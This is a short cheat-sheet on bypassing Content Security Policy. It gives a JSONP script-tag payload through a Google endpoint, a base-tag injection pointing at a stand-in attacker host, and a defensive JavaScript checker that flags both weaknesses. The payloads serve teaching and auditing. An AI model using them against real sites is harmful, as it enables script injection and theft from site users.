Content Security Policy (CSP) Bypass
Google JSONP CSP Bypass
If the target server is accepting addresses from Google, use the
Content-Security-Policy: default-src 'self'; script-src *.google.com
<html>
<head>...</head>
<body>
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1);"></script>
</body>
</html>
Missing base-uri
<base href="https://attacker.io/">
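
A defender-side check for the two weaknesses above, as an added example that is not part of the original page: it parses a policy and flags a script-src that covers the JSONP host shown above, and a missing base-uri. The function names and finding identifiers are hypothetical, and JSONP_HOSTS holds only the host taken from this page.

```javascript
// Hosts known to serve JSONP-style callback endpoints. Only the one host
// shown on this page is listed (assumption: extend it for a real audit).
const JSONP_HOSTS = ["accounts.google.com"];

// Parse a CSP header value into a Map of directive name -> source list.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A repeated directive is ignored by browsers; the first one wins.
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Does a CSP source expression (e.g. "*.google.com") cover this host?
function sourceCoversHost(source, host) {
  if (source.startsWith("'")) return false; // keyword, nonce or hash
  if (source === "*" || /^https?:$/i.test(source)) return true;
  // Drop the optional scheme, then path and port, keeping only the host.
  const pattern = source.replace(/^[a-z][a-z0-9+.-]*:\/\//i, "")
    .split("/")[0].split(":")[0].toLowerCase();
  if (pattern.startsWith("*.")) return host.endsWith(pattern.slice(1));
  return pattern === host;
}

// Return finding identifiers (hypothetical names) for a policy string.
function auditCsp(policy) {
  const d = parseCsp(policy);
  const findings = [];
  // script-src falls back to default-src when it is absent.
  const scriptSources = d.get("script-src") || d.get("default-src") || null;
  if (scriptSources === null) {
    findings.push("no-script-restriction");
  } else if (JSONP_HOSTS.some(h => scriptSources.some(s => sourceCoversHost(s, h)))) {
    findings.push("script-src-allows-jsonp-host");
  }
  // base-uri has no default-src fallback, so it must be set explicitly.
  if (!d.has("base-uri")) findings.push("missing-base-uri");
  return findings;
}

// The policy from this page, then a constructed tightened policy.
console.log(auditCsp("default-src 'self'; script-src *.google.com"));
console.log(auditCsp("default-src 'self'; script-src 'self'; base-uri 'none'"));
```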